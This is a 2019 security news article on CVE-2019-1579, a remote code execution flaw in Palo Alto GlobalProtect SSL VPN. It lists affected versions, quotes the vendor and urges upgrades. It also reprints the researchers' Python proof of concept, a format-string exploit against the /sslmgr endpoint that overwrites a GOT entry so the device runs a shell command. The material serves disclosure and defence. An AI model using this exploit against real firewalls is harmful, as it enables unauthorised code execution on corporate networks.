IS researchers published a PoC code for critical vulnerabilities in Palo Alto Networks firewalls

by Brendan Smith
July 23, 2019
Palo Alto Networks vulnerability
Written by Brendan Smith

Company Palo Alto Networks quietly fixed the critical vulnerability in its corporate SSL GlobalProtect SSL VPN solution implemented in Palo Alto firewalls.

Exploiting the vulnerability allowed attackers remotely execute an arbitrary code. Vulnerability (CVE-2019-1579) affecting the GlobalProtect solution and the GlobalProtect Gateway interface can be exploited by an unauthorized attacker by sending a specially crafted request to the device.

Security researchers Orange Tsai and Meh Chang discovered the bug.

“We surveyed all Palo Alto SSL VPN over the world to see if there is any large corporations using the vulnerable GlobalProtect, and Uber is one of them!”, — said researchers.

Uber took a very quick response and right step to fix the vulnerability.

Affect versions:

According to our survey, all the GlobalProtect before July 2018 are vulnerable! Here is the affect version list:

  • Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
  • Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
  • Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

PoC-code:

Experts published the PoC-code to demonstrate the process of exploiting the vulnerability.

#!/usr/bin/python

import requests
from pwn import *

url = "https://sslvpn/sslmgr"
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"

strlen_GOT = 0x667788 # change me
system_plt = 0x445566 # change me

fmt =  '%70$n'
fmt += '%' + str((system_plt>>16)&0xff) + 'c'
fmt += '%32$hn'
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'
fmt += '%24$hn'
for i in range(40,60):
    fmt += '%'+str(i)+'$p'

data = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt
data += "&appauthcookie="
data += cmd
r = requests.post(url, data=data)

Read also: Drupal fixed a critical vulnerability that could be used to hijack sites

How to fix?

When researchers reported about this bug in Palo Alto Networks, however, they got the following reply:

“Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know”, — commented in Palo Alto Networks.

So, it seems, this vulnerability is known for Palo Alto, but not ready for the world.

Administrators are urged to upgrade to PAN-OS versions 7.1.19 and higher, 8.0.12 and higher, 8.1.3 and later.

Sending
User Review
0 (0 votes)
Comments Rating 0 (0 reviews)

About the author

Brendan Smith

I'm Brendan Smith, a passionate journalist, researcher, and web content developer. With a keen interest in computer technology and security, I specialize in delivering high-quality content that educates and empowers readers in navigating the digital landscape.

With a focus on computer technology and security, I am committed to sharing my knowledge and insights to help individuals and organizations protect themselves in the digital age. My expertise in cybersecurity principles, data privacy, and best practices allows me to provide practical tips and advice that readers can implement to enhance their online security.

View all posts

Leave a Reply

Sending